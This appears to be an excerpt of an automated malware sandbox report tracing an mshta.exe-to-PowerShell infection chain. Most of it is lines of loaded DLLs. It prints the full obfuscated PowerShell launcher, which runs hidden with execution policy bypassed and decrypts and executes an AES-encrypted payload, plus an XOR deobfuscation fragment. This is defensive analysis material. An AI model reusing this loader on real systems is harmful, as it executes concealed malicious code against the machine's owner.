                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb~ source: powershell.exe, 00000009.00000002.3125436846.0000000007805000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.3125436846.0000000007805000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32ement.Infrastructure.Native.dll3f5f source: powershell.exe, 00000009.00000002.3125696403.000000000782D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.3125696403.000000000780C000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$byteString = $enc.GetBytes($string);$xordData = $(for ($i = 0; $i -lt $byteString.length; ) {for ($j = 0; $j -lt $xorkey.length; $j++) {$byteString[$i] -bxor $xorkey[$j];$i++;if
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129)
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129)Jump to behavior
                  Source: Yara matchFile source: 4.2.powershell.exe.6f90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2856842379.0000000006F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049F4960 push 30080151h; ret 2_2_049F4A55
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_049F4A48 push 30080151h; ret 2_2_049F4A55
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0470B76F pushad ; iretd 4_2_0470B770
